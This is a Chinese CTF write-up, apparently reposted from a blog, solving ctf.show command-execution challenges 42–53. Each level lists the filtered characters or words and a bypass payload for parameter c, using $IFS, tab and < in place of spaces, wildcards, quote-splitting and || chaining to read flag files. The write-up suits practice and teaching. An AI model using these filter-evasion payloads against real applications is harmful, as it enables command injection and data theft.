首页 > Web开发 > 详细

ctf_show-web入门-命令执行(42-53)

时间:2021-08-11 23:47:12      阅读:26      评论:0      收藏:0      [点我收藏+]

WEB42

技术分享图片

 

 

 >是写入

而1和2意思百度一下:

技术分享图片

 

 

 那么就是不管标准输出还是错误输出都输入到null里销毁

构造两个语句即可绕过

c=cat flag.php;ls

技术分享图片

 

 

 技术分享图片

 

 

 

 

 

 

WEB43

技术分享图片

 

 

 过滤了;和cat 其他同上一题

过滤分号用&&或||代替 注意url别直接输入&要转码

cat能代替的一大堆

c=more flag.php||ls

技术分享图片

 

 

 

 

 

WEB44

技术分享图片

 

 

 

同上 继续过滤了flag

可以用通配符代替

c=more f*||ls

 

 

 

WEB45

技术分享图片

 

 

 

同上 继续过滤了空格

可以用$IFS代替

c=tac$IFS*||ls

 

 

 

 

WEB46

技术分享图片

 

 

 

过滤了数字 $ 和 *

可以用%09(tab)代替空格

*用 ???????代替

c=tac%09????????||

 

 

 

WEB47

技术分享图片

 

 

继续过滤一些输出 tac没过滤 

同上web46

c=tac%09????????||

 

 

 

 

WEB48

技术分享图片

 

 

 

继续过滤一些输出 tac没过滤 

同上web46

c=tac%09????????||

 

 

 

 

 

WEB49

技术分享图片

 

 

 

同上web46

c=tac%09????????||

 

 

 

 

WEB50

技术分享图片

 

 

 过滤了%09,空格可以用<代替

不知道为啥这里?没用,可以在flag之间加’ ‘ 绕过

c=tac<fl‘‘ag.php||

 

 

 

 

 

 

 

WEB51

技术分享图片

 

 

 这里tac也过滤了,可以用nl

c=nl<fl‘‘ag.php||

 

 

 

 

 

WEB52

技术分享图片

 

 

 继续过来了 <>

但是$过滤,用${IFS}

貌似单用$IFS后面要加\  

另外\ 单写可以随便插入指令中绕过一些检查

 

技术分享图片

 

技术分享图片

 

 

 发现这里没flag

猜测在根目录

技术分享图片

 

 果然

c=nl${IFS}/fla\g||

 

 

 

 

 

WEB52

技术分享图片

 

 

 这里执行方式变了,先是system执行c

在输出结果到前端代码

先ls

技术分享图片

 

 

c=nl${IFS}fla\g?php

 

ctf_show-web入门-命令执行(42-53)

原文:https://www.cnblogs.com/aninock/p/15130230.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!